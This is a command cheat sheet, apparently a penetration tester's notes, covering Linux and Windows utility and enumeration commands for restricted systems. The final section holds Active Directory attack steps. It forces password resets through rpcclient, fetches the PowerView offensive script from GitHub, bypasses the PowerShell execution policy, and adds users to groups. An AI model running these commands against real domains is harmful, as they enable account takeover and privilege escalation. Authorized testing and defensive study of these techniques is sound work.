Nice Commands

These will be a grab-bag of command workarounds usually for restricted systems that lack certain functionality.

Linux

# Pull out IP addresses (IPv4, IPv6, MAC) from text file
grep -hoE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b|\b([0-9a-fA-F]{1,4}:){3,}[0-9a-fA-F]{1,4}\b|\b[0-9a-fA-F]{0,4}::[0-9a-fA-F]{0,4}\b" * | sort -u

# Unzip w/ Python3
python3 -c 'import zipfile, sys; zip_ref = zipfile.ZipFile(sys.argv[1], "r"); zip_ref.extractall("."); zip_ref.close()' <ZIPFILE>

# Unzip w/ Perl
perl -e 'use Archive::Zip; my $zip = Archive::Zip->new(shift); $zip->extractTree();' <ZIPFILE>

# strings replacement
f="<FILE>" ; cat $f | tr -c '[:print:]\t\n' '[\n*]' | awk 'length > 3' | less

# string replacement
f="<FILE>" ; sed 's/[^[:print:]]/\n/g' $f | awk 'length > 3' | less

---

# Map drive
sudo apt install -y cifs-utils
sudo mkdir /mnt/<SHARE>
sudo mount -t cifs -o username=<USERNAME>,password=<PASSWORD>,domain=. //<TARGET>/<SHARE> /mnt/<SHARE>
sudo mount -t cifs -o credentials=credentialfile //<TARGET>/<SHARE> /mnt/<SHARE>
# credentialfile
username=<USERNAME>
password=<PASSWORD>
domain=.

# Search filenames
find <PATH> -name *<KEYWORD>*

# Search keyword in files
grep -rn <PATH> -ie <KEYWORD>

Convert old SSH Key format RSA->OPENSSH

for key in *id_rsa; do ssh-keygen -p -f "$key" -N "" -o ; done

Windows

# Get PS Version
$PSversiontable

---

# Processes or Task List
tasklist /V | findstr <KEYWORD>

# Current User Info
whoami;hostname
whoami /priv          # Show current user's privileges
whoami /groups        # Show current user's group memberships

# List Users & Groups
net user              # List all local users
net localgroup        # List all local groups
net localgroup | findstr admin
net localgroup "<GROUP>"
net localgroup administrators  # List members of the Administrators group

# Password & Account Policy
net accounts          # (Local policy)
net accounts /domain  # (Domain policy)

# Shares
net share             # Shares by current computer
net use               # External connected shares
Get-SmbMapping        # Same but in PowerShell
Get-PSDrive -PSProvider FileSystem

# Map drive
net use <DRIVE>: \\<TARGET>\<SHARE>
net use <DRIVE>: \\<TARGET>\<SHARE> /user:<USER> <PASSWORD>

# Map drive
New-PSDrive -PSProvider "FileSystem" -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"
$secpassword = ConvertTo-SecureString -AsPlainText -Force '<PASSWORD>'
$cred = New-Object System.Management.Automation.PSCredential '<USERNAME>', $secpassword
New-PSDrive -PSProvider "FileSystem" -Credential $cred -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"

# Search filenames
dir /s /b <DRIVE>:\*<KEYWORD>*
Get-ChildItem -Recurse -File -Path <DRIVE>:\ -Include *<KEYWORD>*

# Search keyword in files
findstr /s /i <KEYWORD> <DRIVE>:\*.*
Get-ChildItem -Recurse -Path <DRIVE>:\ | Select-String -Pattern "<KEYWORD>"

Change User Password

via `rpcclient` with `ForceChangePassword` perm

This will only work without the user’s old password if the authenticating user has the ForceChangePassword permission at the domain level (or obviously if the user is a Domain Administrator):

rpcclient -U '<DOMAIN/<USER>%<PASSWORD>' <DC_IP> -c "setuserinfo2 <USER_TO_CHANGE> 23 '<NEW_PASSWORD>'"

via PowerView

Import PowerView:

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1

Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerView.ps1

If needed, authenticated as privileged user first:

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)

Then, create and set NEW password of other account:

$newPassword = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force

Set-DomainUserPassword -Identity <USER> -AccountPassword $newPassword -Credential $Cred -Verbose

And alternatively add more permissions to that user:

# Get Group SID
# $group = (Get-DomainGroup "<GROUP>" -Server <DC_IP> -Credential $Cred).objectsid

# Add User to Group
Add-DomainGroupMember -Identity "<GROUP>" -Members '<USER>' -Domain <DOMAIN> -Credential $Cred -Verbose

# Remove User from Group
Remove-DomainGroupMember -Identity "<GROUP>" -Members '<USER>' -Domain <DOMAIN> -Credential $Cred -Verbose

# Verify Group Membership or Removal
Get-DomainGroupMember -Identity "<GROUP>" -Server <DC_IP> -Credential $Cred | Select MemberName